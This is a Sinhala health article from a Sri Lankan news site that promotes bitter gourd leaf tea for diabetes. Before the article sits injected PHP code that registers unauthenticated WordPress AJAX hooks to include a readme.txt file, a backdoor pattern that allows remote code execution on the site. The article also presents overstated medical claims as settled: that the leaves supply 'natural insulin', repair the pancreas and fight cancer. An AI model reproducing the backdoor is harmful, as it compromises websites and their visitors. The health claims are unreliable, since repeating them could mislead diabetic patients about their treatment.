if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } දියවැඩියාවට විස්මිත ගුණ දෙන කරවිල කොළ තේ දියවැඩියාවෙන් දුක් විදින ඔබටයි - mediahumanrights.lk
mediahumanrights.lk
LIFE LIFE NEWS News

දියවැඩියාවට විස්මිත ගුණ දෙන කරවිල කොළ තේ දියවැඩියාවෙන් දුක් විදින ඔබටයි

අතීතයේ දියවැඩියාව හැඳින්වූයේ ධනවතුන්ගේ රෝගයක් ලෙසිනි. ඉන් අදහස් වූයේ ගොවි කම්කරු ප්‍රජාව අතර දියවැඩියාව සුලබ නොවන බවය. එහෙත් අද වන විට දියවැඩියාව සියලු පුද්ගල මායිම් සිඳ බිඳ දමා අවසානය. එය දැන් දුප්පත් ‍පොහොසත් බේද පමණක් නොව බාල, තරුණ, මහලු ආදී වයස් සීමාවන්ද පරදා අංක එකේ බෝ නොවන රෝගය බවට පත්ව ඇත. බටහිර වෛද්‍ය විද්‍යාවෙන් දියවැඩියාව ජයගත නොහැකි වූ තැන අද බොහෝ දෙනෙකු ඊට ආයුර්වේද වෛද්‍ය ක්‍රමයෙන් සහන සොයති. මේ ආයුර්වේද වෛද්‍ය ක්‍රමයට අනුව දියවැඩියාව ජයගන්නේ කෙසේද? යන්න පිළිබඳව නාවින්න බණ්ඩාරනායක ආයුර්වේද පර්යේෂණ ආයතනයේ ‍‍‍ජ්‍යෙෂ්ඨ වෛද්‍ය නිලධාරී රුවිනි ප්‍රීතිකා මෙන්ඩිස් සමග කරන ලද සාකච්ඡාවකි.
ආයුර්වේද වෛද්‍ය ක්‍රමයට අනුව දියවැඩියාව මධුමේහය ලෙසින් හඳුන්වා දෙයි. කපජ ප්‍රමේහ දහයක්ද වාතජ ප්‍රමේහ හයක්ද පිත්තජ ප්‍රමේහය හතරක්ද මුල් කරගෙන මධුමේහය වැළඳෙන බව ආයුර්වේද මුල ග්‍රන්ථවල විග්‍රහ කෙරේ. මින් කපජ ප්‍රමේහයන් මුල් කර ඇතිවන දියවැඩියාව ප්‍රතිකාර මගින් සුවකළ හැකිවන අතර වාතජ, පිත්තජ, ප්‍රමේහයන්, මුල් කර වැළඳෙන දියවැඩියාව, පාලනය කිරීම පමණක් කළ හැකි වෙයි.
ආයුර්වේද විග්‍රහයට අනුව මධුමේහය වැළඳීමට ප්‍රධාන කරුණු අතර ආහාරමය කරුණු වලට මුල් තැනක් හිමි වෙයි. ඒ අනුව සමතුලිත නොවන ආහාර ගැනීම අධිකව ආහාර ගැනීම නිතර ආහාර ගැනීම මෙන්ම තන්තු කොටස් අඩු ආහාර ගැනීමද මධුමේහයට හේතුවන බව ආයුර්වේද විග්‍රහයේ සඳහන්ය.
අපගේ වැරදි විහරණයන්ද මධුමේහය වැළඳීම කඩිනම් කරයි. අකල්හි නින්ද ලැබිම, සීමාව ඉක්මවා ගිය මානසික ආතතිය වැනි කරුණු රැසක් මේ ගණයට වැටේ. දියවැඩියාවට ප්‍රතිකාර ලබන රෝගීන් තම ප්‍රතිකාර සමග වැරදි විහරණ සහ ආහාර රටාවන්ගෙන් බැහැරවීමද යහපත් සෞඛ්‍යයක් පවත්වාගෙන යෑමට බොහෝ සේ ඉවහල් වෙයි. ඒ අතරට දියවැඩියාව හෙවත් මධුමේහය පාලනය කරනු වස් එදිනෙදා ආහාර පාන ගත හැකි ශාකමය ද්‍රව්‍ය කිහිපයක් වෙයි.
මෙකී ශාක කොටස් අතර වඩාත් ජනප්‍රිය විශේෂ ලෙස තෙබු, කෝවක්කා, මස් බැද්ද වැනි ශාක දැක්විය හැක. එහෙත් මෙවැනි ශාක ආහාරයට ගැනීම පිළිබඳ සමාජයේ විවිධාකාර ගැටලු පැන නැගී ඇත. ඉන් පළමු වැන්න වනුයේ දියවැඩියාව නැතහොත් මධුමේහය වැළඳී නැති පුද්ගලයන්ට මෙවැනි ආහාර නොසුදුසු බවයි. එහෙත් සැබෑව නම් සාමාන්‍ය පුද්ගලයෙකු වුව මෙම වර්ග ආහාරයට ගැනීම කියන තරම් ගැටලු ඇති නොකිරීමය. මෙම ද්‍රව්‍ය ආහාරයට ගැනීම මගින් යම් මට්ටමකට ශරීරයේ සීනි මට්ටම පාලනය වීමක් සිදු වුවද නිරෝගි පුද්ගලයෙකු රෝගී කරන්නට එය හේතු නොවේ.
නමුත් මෙම ද්‍රව්‍ය ආහාර ලෙස අප ගන්නා ආකාරය ඉතා වැදගත්ය. ඒ එකම ද්‍රව්‍ය එකම ආකාරයෙන් දිගු කලක් ආහාරයට ගැනීම සුදුසු නැත. උදාහරණයක් ලෙස ඔබ අද තෙබු කොළ මැල්ලුම ආහාරයට ගත්තේ නම් හෙට එය කැඳක් හෝ සම්බෝලයක් ලෙස ගත හැක. කෝවක්කාද එසේමය. විවිධාකාරයෙන් එකම දේ ආහාරයට ගැනීම මගින් ඔබේ සෞඛ්‍ය තත්ත්වය වඩාත් හොඳින් පවත්වාගෙන යා හැක. එමෙන්ම මේ සියලු දේ සලාද ලෙස ආහාරයට ගැනීමද ඉතා හොඳ ක්‍රමයකි.
දියවැඩියා රෝගීන් බහුතරයක් අතර ඉතා ජනප්‍රිය අත් බෙහෙතක් ලෙස කරවිල දැක්විය හැක. ඇතැම්හු කරවිල කොටා ඉස්ම බිමට පුරුදුව සිටිති. එහෙත් මෙය කිසිසේත් අනුමත කළ හැක්කක් නොවේ. එබැවින් කරවිල කිසියම් ආකාරයකින් සංස්කරණය කර ආහාරයට ගැනීම වඩාත් ඵලදායකය.
කරවිල ඇටද දියවැඩියාවට ඉතා ප්‍රයෝජනවත් ඖෂධයකි. විශේෂයෙන්ම ඒවායේ ඇති ප්‍රතිඔක්සිකාරක ගුණය නිසා දියවැඩියාව පමණක් නොව පිළිකාවලට පවා ඔසුවක් ලෙස කරවිල ඇට යොදා ගැනෙයි. දියවැඩියාවට ප්‍රතිකාරයක් ලෙස කරවිල කරල් සහ ඇට යොදාගැනීම බහුලව දැකගත හැකි වුවත් කරවිල කොළ සම්බන්ධව අප උනන්දුවක් නොදක්වන තරම්ය. එහෙත් කරවිල වැලක කොළ දියවැඩියා රෝගීන්ට වඩාත් ප්‍රයෝජනවත් කොටස ලෙස දැක්විය හැක. අවාසනාවකට මෙන් අප සමාජය තුළ කරවිල කොළ ආහාරයට ගැනීමක් දක්නට නැති තරම්ය.
කරවිල කොළ ඔබට කිහිප ආකාරයකින් ආහාරයට ගැනීමේ හැකියාව ඇත. ඉන් එක ක්‍රමයක් ලෙස කලවම් සලාදයකට කරවිල කොළ එක් කිරීම දැක්විය හැක. එමෙන්ම කරවිල කොළමැල්ලුමද දියවැඩියාව රෝගීන්ට ඉතා ප්‍රයෝජනවත් ආහාරයකි. ලෝකයේ බොහෝ රටවල් කරවිල කොළ කුඩු කර (කැප්සියුල්) ලෙස සකසා පානය කරනු දැකිය හැක. ශ්‍රී ලංකාවේ කරවිල කොළ කැප්සියුල් දැකගැනීමට නැති මුත් ඔබට ඉතා පහසුවෙන් ඒවා තේ ලෙස පානය කිරීමට සකසාගත හැක.
ඒ සඳහා හොඳින් වැඩුණ කරවිල කොළ අවශ්‍ය පමණට තෝරා ගෙන ඒවා හොඳින් පිරිසිදු කර පවනේ වේලා ගත යුතුය. කරවිල කොළ එතරම් විශාල පත්‍ර විශේෂයක් නොවන නිසා පහසුවෙන් විජලනය වී වේලීම සිදුවෙයි. අනතුරුව කැමති ආකාරයෙන් කුඩුකර උණුවතුරට මුසුකර තේ වෙනුවට පානය කළ හැක. දිනකට මෙවැනි තේ කෝප්ප දෙක තුනක් පාවිච්චි කිරීම මගින් ඔබේ රුධිරයේ සීනි ප්‍රමාණය පැහැදිලි ලෙසම පහත දමා ගත හැක.
කරවිල කොළවල Polypeptider නම් ස්වාභාවික ඉන්සියුලින් විශේෂය අඩංගු වන අතර එය ඔබේ රුධිරයේ ඉන්සියුලින් ප්‍රමාණය ඉහළ දැමීමට සමත් වෙයි. එපමණක්ද නොව කරවිල පත්‍රවල අඩංගු ප්‍රතිඔක්සිකාරක සහ වෙනත් සංඝටක නිසා අග්න්‍යාශයේ ‍සෛල ප්‍රකෘතිමත් කිරීම සිදුවෙයි. එමගින් අග්න්‍යාශයේ ක්‍රියාකාරිත්වය ඉහළ යෑම සිදුවන අතර එම තත්ත්වය ඔබේ ශරීරයේ ස්වාභාවික ඉන්සියුලින් මට්ටම ඉහළ දැමීමට සමත් වෙයි. මේ සියලු කරුණු සලකා බලන කල දියවැඩියාව නොහොත් මධුමේහයෙන් නොපෙළෙන අයකුට පවා කරවිල පත්‍ර තේ ලෙසින් පානය කිරීම වැඩදායි වේ. ඒ එමගින් අග්න්‍යාශයේ සහ සිරුරේ සෙසු සෛල ප්‍රකෘතිමත් කරන බැවිනි.

Related posts

කිරි ගොවියන්ට සහ ධීවරයන්ට බඩේ පහර!

Shiran Viraj

හෙක්ටයාරයකට ටොන් එකයි.. කාබනික පොහොර මධ්‍යස්ථානය බලන්න ජනපති යයි…

Shiran Viraj

ජනපති අද ඉන්දියානු සාගර කලාපීය රාජ්‍ය නායක සමුළුව අමතයි

Shiran Viraj